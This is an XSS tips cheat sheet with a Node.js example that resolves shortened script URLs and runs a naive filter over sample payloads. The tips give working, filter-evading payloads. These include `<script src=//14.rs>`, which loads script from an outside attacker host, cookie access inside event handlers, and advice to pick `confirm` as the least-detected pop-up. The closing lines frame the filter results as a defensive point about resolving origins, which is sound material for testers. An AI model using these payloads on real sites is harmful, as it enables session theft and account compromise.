# XSS Tips

## Tips & Tricks

- `http(s)://` can be shortened to `//`, `/\\` or `\\`. Browsers' URL parsers treat `\` like `/` in the scheme-relative position, so all three resolve to a scheme-relative URL that inherits the page's own scheme.
- `document.cookie` can be shortened to `cookie`; the same applies to other `document` properties such as `domain`. This works inside inline event handlers (for example `onload=alert(cookie)`), whose scope chain includes the document, but not inside a `<script>` block, where a bare `cookie` is an undefined identifier.
- `alert` and the other pop-up functions don't need an argument, so stop doing `alert('XSS')` and start doing `alert()`.
- You can use `//` instead of `>` to close a tag, as in `<svg onload=alert()//`. The tag is really closed by the next `>` in the page; whatever follows the payload up to the next whitespace or `>` is absorbed into the unquoted handler value, and the `//` turns it into a JavaScript comment so the handler still runs.
- I have found that `confirm` is the least detected pop-up function, so stop using `alert`.
- Quotes around an attribute value aren't necessary as long as the value doesn't contain spaces: `<script src=//14.rs>` works instead of `<script src="//14.rs">`.
- The shortest HTML-context XSS payload is `<script src=//14.rs>` (20 characters). It relies on an attacker-controlled host serving the script, so the browser must be able to reach that host.
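The scheme-shortening and pop-up tips above defeat filters that look for literal `http://` or `alert(`. The following is an added example (not code from the original page) that resolves the shortened `src` forms with the WHATWG `URL` parser, which Node ships and browsers implement, and runs a deliberately naive filter over sample payloads to show which ones it misses. The page URL `https://victim.example/profile`, the `x.js` path and the payload list are constructed for the example; `14.rs` is the host from the tips.

```javascript
// Added example, not from the original page. Runs under Node (WHATWG `URL` is global).

// Resolve a script src the way a browser would for a tag sitting on `pageUrl`.
// For special schemes (http, https) the WHATWG parser treats '\' like '/', so
// "//", "/\" and "\\" all collapse to a scheme-relative URL. A single leading
// "\" is NOT enough: it is treated like "/", i.e. a path on the same host.
function resolveScriptSrc(rawSrc, pageUrl) {
  return new URL(rawSrc, pageUrl).href;
}

// A naive blocklist of the kind the tips defeat: it rejects a literal scheme
// prefix and the alert() call, and nothing else.
function naiveFilterBlocks(payload) {
  return /https?:\/\//i.test(payload) || /\balert\s*\(/i.test(payload);
}

// Constructed page URL (assumption) and the shortened src forms from the tips.
const PAGE = 'https://victim.example/profile';
const SRC_FORMS = [
  '//14.rs/x.js',     // protocol-relative
  '/\\14.rs/x.js',    // "/\" form
  '\\\\14.rs/x.js',   // "\\" form
  '\\14.rs/x.js',     // single backslash: stays on the victim host
];

// Constructed payloads to run the naive filter over.
const PAYLOADS = [
  '<script src=http://14.rs></script>', // blocked: literal scheme
  '<script src=//14.rs>',               // passes: protocol-relative
  '<script src=\\\\14.rs>',             // passes: backslash form
  '<svg onload=alert(cookie)>',         // blocked: alert(
  '<svg onload=confirm()>',             // passes: different pop-up function
];

// Returns one {payload, blocked} record per sample payload.
function filterReport() {
  return PAYLOADS.map((p) => ({ payload: p, blocked: naiveFilterBlocks(p) }));
}

for (const s of SRC_FORMS) {
  console.log(`${s.padEnd(16)} -> ${resolveScriptSrc(s, PAGE)}`);
}
for (const { payload, blocked } of filterReport()) {
  console.log(`${blocked ? 'BLOCKED' : 'passed '}  ${payload}`);
}
```

Three of the four `src` forms resolve to `https://14.rs/x.js`, while the single-backslash form stays on `victim.example`, which is why the tip specifies `\\` rather than `\`. The filter run shows that matching on scheme prefixes or on one function name is not a defence: the `src` value has to be resolved to an origin before any policy decision is made.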